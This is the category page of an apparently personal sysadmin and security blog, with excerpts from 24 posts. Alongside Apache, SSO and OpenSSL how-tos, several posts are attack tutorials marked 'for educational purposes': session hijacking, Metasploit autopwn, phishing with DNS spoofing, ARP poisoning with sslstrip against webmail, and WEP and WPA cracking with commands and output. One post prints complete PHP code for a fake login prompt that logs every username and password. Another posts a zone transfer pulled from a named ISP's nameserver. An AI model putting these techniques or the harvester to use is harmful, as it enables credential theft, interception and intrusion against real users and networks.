This category contains 24 posts

Web based Session Hijacking attacks

Session Hijacking involves that the interceptor has used Man-in-the-middle attack to steal session dependent attributes (like cookies) of an unsuspecting user who logins in to a web site so as to get unauthorised access and browse private content. I don’t encourage computer hacking as it is ilegal, but I write this article for educational purposes … Continue reading

Using m0n0wall to Create a WiFi Captive Portal

  m0n0wall, is a very powereful firewall based on FreeBSD. For the Captive Portal setup, i used ; 1. a diskless PC with 2xethernet ports 2. an Access Point 3. a Broadband ADSL+2 router 4. a switch 5. a compact flash card (from my canon ixus:) 6. my linux laptop to flash the image on … Continue reading

Green Technology – Computing

You want to save money on Electricity? Use Green Technology! I have successfully implemented the Wake-On-LAN standard over Internet. Now you don’t need to leave your computer on continuously so that you are able to access it remotely. I can help you conserve energy and save money as well. How it Works; … In the … Continue reading

How to use metasploit framework

This is for Educational Purposes only !! This Howto shows how to gain access on a remote PC (windows XP Pro SP2) exploiting a known Vulnerability bug with autopwn tool. Installation Howto (ubuntu) $ sudo apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby $ sudo apt-get install libreadline-ruby irb ri rubygems $ sudo apt-get install subversion … Continue reading

How Phishing Works along with Dns Spoofing

This is for Educational Purposes Only!! This post describes how Phishing works. Many howtos exist on Internet but dont do the job silently and the victim understands that something goes wrong … Attacker’s Side IP: 1. install ettercap 2. install Apache with php support 3. Make sure with ping command that facebook.com points to or … Continue reading

Opensource IT Security Solutions

Implementation of SSO (Single-Sign-On) procedures according to ADAE’s Requirements for Telcos, ISPs, Banks, etc. SSO Apache Authentication Against Active Directory, SSO Proxy Squid Authentication Against Active Directory, SSO vsftpd Authentication Against Active Directory. Web Content Filtering and Anti Virus Services. Integration of OpenSSH with OpenLDAP, Kerberos, Active Directory standards (SSO) with full logging and replay … Continue reading

ARP Poisoning – mitm against faceb00k, Gma1L, etc using sslstrip

THIS IS FOR EDUCATIONAL PURPOSES ONLY !!! This method doesnt expose any certiface warning to the user since the SSL connections are turned into plaintext ones. So, never use corporate or public LANs, WiFi Hotspots to access eshops, your personal email,  faceb00k or case sensitive data. 0) Install ettercap root@pilio-laptop:/# apt-get install ettercap 1) we download … Continue reading

C API OpenSSL / libcrypto sample code

#include <stdio.h> #include <string.h> #include <openssl/sha.h> int main() { unsigned char ibuf[] = “Hello, World“; unsigned char obuf[20]; SHA1(ibuf, strlen(ibuf), obuf); int i; for (i = 0; i < 20; i++) { printf(“%02x “, obuf[i]); } printf(“\n”); return 0; } [root@node1 tmp]# gcc pilio.c -Wall -lcrypto -o pilio [root@node1 tmp]# ./pilio 90 7d 14 fb … Continue reading

THC-Hydra – The ultimate security assessment tool for NW Services

A very fast network logon cracker which supports; AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY (Basic, DIGEST-MD5, NTLM), HTTPS-FORM-GET, HTTPS-FORM-POST, LDAP (Simple), HTTPS-GET, HTTPS-HEAD, ICQ, IMAP (Clear, Login, Plain, CRAM-MD5, CRAM-SHA1, CRAM-SHA256, DIGEST-MD5, NTLM), MS-SQL, MYSQL, NCP, NNTP, PCNFS, POP3 (Clear, APOP, Login, Plain, CRAM-MD5, CRAM-SHA1, CRAM-SHA256, DIGEST-MD5, NTLM), POSTGRES, REXEC, SAP/R3, … Continue reading

WiFi – WPA-PSK Security assessment with Pre-computed hashes

This post is for educational purposes only !!! On my eeepc i reached 36492.90 keys/second #sudo -i #apt-get install libssl-dev libpcap0.8-dev #wget http://wirelessdefence.org/Contents/Files/cowpatty-4.6.tgz #tar -xzf cowpatty-4.6.tgz #cd cowpatty-4.6 root@pilio-laptop:/cowpatty/cowpatty-4.6# make cc -pipe -Wall -DOPENSSL  -O2 -g3 -ggdb   -c -o md5.o md5.c cc -pipe -Wall -DOPENSSL  -O2 -g3 -ggdb   -c -o sha1.o sha1.c cc -pipe -Wall -DOPENSSL  -O2 … Continue reading

WiFi WEP key security assessment

++++++++++++++ 1st terminal window +++++++++++++++++ #airmon-ng start wlan0 #airodump-ng –bssid D8:5D:4C:9D:AC:2D –channel 1 -w tp_link mon0 +++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++ 2nd terminal window ++++++++++++++ #aireplay-ng -1 0 -e TP-LINK_9DAC2D -a D8:5D:4C:9D:AC:2D -h 00:E0:4C:83:10:BF mon0 22:10:01  Waiting for beacon frame (BSSID: D8:5D:4C:9D:AC:2D) on channel 1 22:10:01  Sending Authentication Request (Open System) [ACK] 22:10:01  Authentication successful 22:10:01  Sending Association … Continue reading

Streaming & Unified Messaging Solutions

Installation /Configuration of PacketVideo’s Streaming Platform (Solaris8,SPARC) + encoder (windows 2003) installation / configuration using WINNOV’s Videum Quattro acquisition cards with multiple encoded downstreams per source – ideal solution for mobile operators (RTSP) Installation / Configuration of MS Media Server (Windows 2000,2003) + MS encoder Installation / Configuration of Openfire 3.5.2 (unix,linux) integration with MSN, … Continue reading

The Web Server is not sending the required intermediate certificate through a SECURE HTTPS Session

Some System admins forget to configure the intermediate Certificate and the SSL handshake between browser and Web Server returns ; Verify return code: 21 (unable to verify the first certificate) and not Verify return code: 0 (ok) # openssl s_client -connect http://www.vivodi.gr:443 -state New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA Server public key is 1024 bit SSL-Session: … Continue reading

A Simple PHP Authenticator which logs users’ usernames and passwords

<?php if (!isset($_SERVER[‘PHP_AUTH_USER’])) { header(‘WWW-Authenticate: Basic realm=”Restricted Area”‘); header(‘HTTP/1.0 401 Unauthorized’); echo ‘401 Unauthorized’; exit; } else { $a=$_SERVER[‘PHP_AUTH_USER’]; $b=$_SERVER[‘PHP_AUTH_PW’]; $myFile = “./testFile.txt”; $fh = fopen($myFile, ‘a’) or die(“ferror!!!”); fwrite($fh, $a); fwrite($fh,”\n”); fwrite($fh, $b); fwrite($fh,”\n”); fwrite($fh,”——————-\n”); fclose($fh); header(‘WWW-Authenticate: Basic realm=”Restricted Area”‘); header(‘HTTP/1.0 401 Unauthorized’); echo ‘401 Unauthorized’; exit; } ?> # tail -f testFile.txt ——————- … Continue reading

Apache seems to be eating RAM – How to reduce the memory footprint of apache using an alternative Apache other than Linux’s Pre-Packaged

#./configure \ –with-included-apr \ –prefix=/opt/apache_worker \ –with-mpm=worker –enable-so \ –enable-unique-id \ –enable-proxy –enable-proxy-http –enable-proxy-ftp \ –enable-proxy-ajp –enable-proxy-balancer \ –enable-rewrite –enable-headers –enable-setenvif \ –enable-logio \ –enable-expires \ –enable-ssl \ –enable-deflate –enable-cache –enable-file-cache –enable-mem-cache –enable-disk-cache \ –disable-autoindex –disable-asis –disable-cgi –disable-cgid \ –disable-negotiation –disable-userdir #make && make install

MySQL Driven Apache NCSA Log Parser – Linux Ansi C (gcc)

mysql> desc apacheLog; +———+————–+——+—–+———+——-+ | Field | Type | Null | Key | Default | Extra | +———+————–+——+—–+———+——-+ | myDATE | datetime | NO | | NULL | | | hosts | varchar(255) | NO | | NULL | | | method | char(4) | NO | | NULL | | | url | varchar(255) … Continue reading

Encrypted Volumes under Linux / Windows

1. Under Linux use the following procedure ; # modprobe aes # modprobe twofish # modprobe cryptoloop # mkdir $HOME/crypto #dd if=/dev/urandom of=$HOME/crypto/container.aes bs=1k count=102400 # LOOPDEV=$( losetup -f ) # echo “Our loop device is ‘$LOOPDEV'” # losetup -e aes $LOOPDEV $HOME/crypto/container.aes    (insert a strong passphrase) # mkfs.ext3 -m 0 $LOOPDEV # tune2fs -i … Continue reading

How to transmit/receive ASCII/BINARY data between 2 hosts using netcat and file descriptors

//Server Side// [root@node1]# nc -l -p 8080 -vvvvv listening on [any] 8080 … //Client Side// [root@node2]# exec 5/dev/tcp/ [root@node2]# echo “this is a test” >&5 [root@node2]# echo “this is a test” |openssl base64 -e >&5

Authenicate Apache Against Active Directory (SSO) – Eponymous LDAP Bind

// Apache Module // LoadModule authz_ldap_module modules/mod_authz_ldap.so // Apache Module // [Directory “/var/www/html”] AuthType Basic # What the users will see as a “title” of the login prompt: AuthName “Domain Credentials Required” # use plain LDAP authentication: AuthzLDAPMethod ldap # FQDN resolvable hostname (or IP) of the Windows # AD domain controller: AuthzLDAPServer # … Continue reading

Authenticate SQUID PROXY against Active Directory (SSO)

Prerequisites; 1) Samba / Winbind sw 2) Kerberos Libraries 3) System is joined to the Active Directory 4) Squid Package Squid configuration; auth_param ntlm program /usr/bin/ntlm_auth –helper-protocol=squid-2.5-ntlmssp auth_param ntlm children 30 auth_param ntlm max_challenge_reuses 0 auth_param ntlm max_challenge_lifetime 2 minutes auth_param ntlm use_ntlm_negotiate on auth_param basic program /usr/bin/ntlm_auth –helper-protocol=squid-2.5-basic auth_param basic children 5 auth_param basic … Continue reading

Apache PKI Implementation

#openssl pkcs12 -clcerts -export -inkey server.key -in server.crt -out clientKey.p12 #openssl pkcs12 -clcerts -nokeys -in clientKey.p12 -out CA_pilio.crt.pem #cp CA_pilio.crt.pem CA_pilio.crt // Apache SSL Configuration // SSLVerifyClient require SSLVerifyDepth 1 SSLCACertificateFile /etc/pki/tls/certs/CA_pilio.crt // Apache SSL Configuration // clientKey.p12 client SSL Key must be loaded in your web browser

How to fetch user’s SMIME cerificate (Public Key) from Active Directory (eponymous bind) using Perl

#!/usr/bin/perl use Net::LDAP; use IO::File; binmode STDOUT; my $CREATE_CERT = new IO::File “> /tmp/mycert.cer”; $ldap = Net::LDAP->new(‘’) or die “Could not connect: $@”; $result = $ldap->bind(‘CN= bind_usr ,OU=System Administrators,OU=Project Management & Support Dpt,OU=Systems Technical Division,OU=EMPLOYEES,DC=CONTOSO,DC=MSFT’,password =>’mypass’); die $result->error if $result->code; # do stuff $search = $ldap->search(base=>’OU=EMPLOYEES,DC=CONTOSO,DC=MSFT‘,scope=>’subtree’,filter=>'(&(objectclass=user)(objectcategory=Person))’); die $search->error if $search->code; print “Total entries returned: “,$search->count,”\n”; … Continue reading

HOL GREEK ISP – DNS Misconfiguration Issue

It seems that HOL is Vulnerable to DNS AXFR Zone transfer for Primary, secondary and Tertiary Domain Zones (forward / reverse zones) from unauthorized IP networks.! # dig @ns1.hol.gr hol.gr -t AXFR ; <> DiG 9.5.1-P2 <> @ns1.hol.gr hol.gr -t AXFR ; (1 server found) ;; global options: printcmd hol.gr. 7200 IN SOA ns0.hol.gr. hostmaster.hol.gr. … Continue reading

sample integrations

Samples …